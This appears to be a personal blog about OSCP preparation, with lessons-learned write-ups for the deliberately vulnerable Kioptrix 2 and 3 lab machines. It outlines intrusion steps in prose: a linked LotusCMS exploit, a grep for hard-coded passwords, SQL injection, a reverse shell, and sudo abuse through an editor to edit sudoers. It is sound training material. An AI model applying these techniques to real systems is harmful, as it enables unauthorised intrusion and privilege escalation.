My goal is, win or lose, to look back and see how I could have prepared better and apply that to the next milestone. I know that, of course, I could have done more, but I feel like I did ok for preparation right now. My overriding mantra was not to sweat it too much. I know enough about the OSCP coursework that I know it will walk me through some of the things I know I had some difficulty with, like exploit development and web stuff. But I also geared my prep to hit some of those areas. I went over several exercises in developing buffer overflow exploits. I went through the Kioptrix series (among others) from Vulnhub.com and focused on the SQLi in particular. I hit the Pentesterlab.com web penetration testing exercises and broke down the mechanics, the way I like to learn.

So I’m cautiously optimistic. Let’s see how I feel in a few weeks. I’ve been reading a lot lately focused more on how to learn rather than what to learn. I just discovered the Slack channels over at NetSec Focus and immediately got some good advice about not focusing on the number of roots/day or any kind of metric like that, but understanding the practice and the mechanics of the service/attack.

Let’s see how it goes.

Kioptrix 3 – 3 Ways to Win

This one is great. More web stuff. More of me failing at SQL injection. It’s worth failing to learn, though. I keep making progress via exploits and tools, but I need to get stronger on these more basic concepts.

The entire challenge hinges on getting one of two user account passwords. Looking at the webpages and seeing the LotusCMS software, my first instinct was to look for a vulnerability for that. And I found a couple, but this one worked: https://github.com/Hood3dRob1n/LotusCMS-Exploit.  So that works and gets a shell with the www-data account, which isn’t much. There are a couple of exploits listed for the Linux kernel that should have escalated privs, but they didn’t work. So I tried doing grep -rn “password”, which worked on one of the SANS Holiday Hack challenges. Sure enough, hard-coded mysql password.

There are three ways, that I know of, to get the user creds. First is the method I used, which is to use the LotusCMS exploit, find the hardcoded MySQL password, then go to kioptrix3.com/phpmyadmin/index.php and log in there. From there, you can get the user credentials for loneferret and dreg. You can also use SQL injection on the parameters from the gallery on the main site and get the creds that way, or use sqlmap to get the creds.

Once in, you can sudo to use the ht text editor as root, which allows you to edit the sudoers file. Clever. I liked seeing multiple paths to victory here, even if I only saw them all after the fact. Now on to Kioptrix 4, which is quite a bit harder for me.

Kioptrix 2 – Lessons Learned

Rather than do a traditional walkthrough on most of these, I think I’ll just do a “lessons learned” type thing. That’s more useful for me, and honestly, the world doesn’t need another Kioptrix walkthrough.

So with the first one I feel like I was pretty much successful. I took a generic pentesting methodology and applied it using the specific tools I had, and it worked out well. With this one, things were a bit more tricky.

Mistake one: I didn’t use anything to enumerate web pages on the site. So I spun my wheels on the services detected through nmap for much longer than I should have rather than just looking at the index.php page. One look and it becomes pretty clear that the entry point of this VM does not lie in analysis of tool feedback and research of vulnerabilities associated with software. A little SQL injection and you’re in, and given a prompt that runs the ping command. I was able to set up a reverse shell and now we’re in the box as the apache user. This is where the research comes in and reveals a privilege escalation vulnerability for the Linux kernel.

Mistake two: I missed the hardcoded credentials in the index.php source code. If the objective is just to own the box, well that’s not of too much consequence. But the objective here is really just to get as much info as possible and missing that bit of data is instructive for the future.

So far, my objective has been to stay away from Metasploit and see what I can do manually and it has been working out. These haven’t been challenging but there are inefficiencies and things I miss so I need to shore that up. I’m making a playbook for these machines and making some adjustments based on my results. Next up: Kioptrix 3.